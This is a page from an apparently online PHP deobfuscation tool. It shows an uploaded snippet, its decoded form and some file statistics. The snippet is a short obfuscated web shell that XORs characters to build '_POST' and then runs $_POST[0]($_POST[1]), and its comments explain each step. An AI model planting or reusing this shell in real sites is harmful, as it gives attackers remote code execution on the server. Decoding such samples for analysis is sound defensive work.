Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _P ..

Decoded Output download

<?php 
    @$_++; // $_ = 1 
    $__=("#"^"|"); // $__ = _ 
    $__.=("."^"~"); // _P 
    $__.=("/"^"`"); // _PO 
    $__.=("|"^"/"); // _POS 
    $__.=("{"^"/"); // _POST  
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]); 
?>

Did this file decode correctly?

Original Code

<?php
    @$_++; // $_ = 1
    $__=("#"^"|"); // $__ = _
    $__.=("."^"~"); // _P
    $__.=("/"^"`"); // _PO
    $__.=("|"^"/"); // _POS
    $__.=("{"^"/"); // _POST 
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

Function Calls

None

Variables

None

Stats

MD5 3214d623e99a3a099272ac220f84afc2
Eval Count 0
Decode Time 86 ms